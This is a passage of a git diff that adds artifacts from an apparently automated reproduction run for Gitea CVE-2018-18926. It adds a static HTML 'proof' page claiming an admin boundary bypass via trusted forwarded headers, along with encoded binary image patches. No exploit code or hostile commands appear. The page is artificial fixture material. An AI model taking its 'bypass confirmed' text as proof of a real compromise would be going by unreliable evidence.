zT;Ry>u8x1UFq?y;i<>V&qzy*58@%dU9~`JLlG+P{%}q^e3$=o1^Z<H$U5mfA{D>_)
zUqFoX907i>ZAcP>#nz}AsTw?j!BQR1e*#}dbD$;N(e%5Ou|-9NP0$H1uBeEph(H!A
z``6b~;5*fhDzr)dweGo#ul!y2Cj!v|2l$UQ`afgv&vo$M_27*EMN|LJeDGiP0F{4T
z2c(5F*Z<$U?f;1nh56Sx!72S`KG)`-Q}}=Jc%py4#(%!X|6_CwOo{)UbK(yooH>!0
i(MOJeKPX6f)X_t!lqibV1JydDQIWl;BvT}181O&n=d>IE

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html
new file mode 100644
index 00000000..59a3bc2b
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Proxy Boundary Fixture - proof</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Proxy Boundary Fixture</h1>
+    <p>Forwarded header trust boundary and admin gate fixture.</p>
+    <div class="proof">Proof active: trusted forwarded headers crossed the boundary</div>
+    <p>System: <code>gitea</code> / Family: <code>proxy-boundary</code></p>
+    <section id="admin-proof">Admin boundary bypass confirmed.</section>
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png
new file mode 100644
index 0000000000000000000000000000000000000000..c5abfac3c2cb987cddd973c917737f861ebce7da
GIT binary patch
literal 36925
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%0A-e=GOEJqoUud%-<hz
z>FA6g<Ba9|5}oLiE$#C6hsx=AfurJ97*}^wL(Pq5wps#pOD@*oh+&RNQu04o9gwOD
zz3t+rDCD*6?h%(*cCbBdyzz8Urzo;X6Mkej_W7<?XS~20q;4N=Vj$g62|FjbH<(m(
z-P_wSM_e-GWe3a{e*k__PWo_V!}8|-Y|0#=bk5x1!Z68#D(6|6pOH=jzXbP)b(4}k
zQJ#a@O%}w8W4#%|a#fxh?xFD=me2@lZhzou8JwA#5;3l?9(-p1FAbA$P!2u6lag#Z
z#K6LE{RV`!X6jpH;?g;ir|l86#LQ-SfT(xCpof@)hQ8re#nCIi$e3@7petMMp=b`c
zo&#k|5{D_EBV3V13BwQ_CQ}u$MAmb`DIJ7{yqHO&w?3D~HCoiz*xYHh!X9w<e4~7o
z80w!KlKr>P-iHdFcEY%uQxHS+`oFncM+~ak>+3gswQpT#k62@0%KIO0UjhI*IXQ8(
zKBC-%*`04q(E3ZpyAJA)QRne^e&=nfiK>+3_TM2y#7xlvzyjj6Jr%LO`pWhf*~CiX
z5yF5kfz!ZH-x-722k8@JXoF^_{Idk+xb~HfjE$cy!HP*G-Y5P2g*yRruaEwOkuaZ}
z>@Ea`C5piI-kc4~SeSk2?d=VGK>8;`xc%~+V0*e@XKBe%B+zR|ycP)Aa8<NMQ9=-_
zZrQ}-Wapm4VBYISZ<kWjW|#BcjIU4V6ew57OnZYofcwUowzX|k=Tjn^8(wJ|zcZ%h
zS_0(kU;^5g153bAMX)U%FJ{{4&-@vB@z15aOIA{P{$&WTB~<}<2nar1gh5d$ga{L)
zsAQdzeDBF-^+!3Im;{<vaFv^78dVeJfCYnH;oe_#ocI<pi8<qCjb%`Fz4%=S%v16t
zmvAY2$9vD&_a(ySmwOCHM@O|Ie)(UXd041f_ohD*vM&gpsJ4|_Nmdc|+=QJk8_&PN
zYmcHl?9rzB>W~kTaqLpS+3*Cf{g|JRFPLT-WnTuAhQ}tay_VngcFWOL0~>pZg#w?G
z9`Q8uS#O4)h={0VDyHVV(E`w3QCY99_(>g}X~I>QH1e_?zC0l1sPkCq&3+AC!czEz
zvzw<W_ura6XncEBa&fxv>whp_?NeL>kGhzdo|eU-o(47qZ1lPOWoc(yo6LOmJ0F!)
zh90Qzadb39ys3kzO{OA>YZN-a#HyRezxH#eOOc|~xM8<vtH^LH@(G<xG;FEHVO|vn
z1WoZDz!UX+ZLlEbQ<O{E?YsC$$FU0Q<I>7LgL<V_P((A|5^e{ej-2PaX=~`n$P7qI
z#$~THk##bMMf%*<I%z|B^7N+huX17CN#apiS+fAxwADrJ?Vf7Ym@KgBJ{0Z;$ar(M
zOgF!CX}Q;!%>9E#Ph7_Gi$KMIgOl%M_Y;)qSH5S|d#*7FFU2vaYC>e=FPF__kC9Fj
z4il9LO}?HnQS1gNVfWRq?m!eDC`t%Z?rwPVQzjxcOE};)9+P&y+*~4q@_JWNncVxm
zfB*g@ie^n39+zf-@|j7vA9$=(61Z9`78pS-pW_)zVX(}WlJ{B?7<VRi0L_guB1Xmu
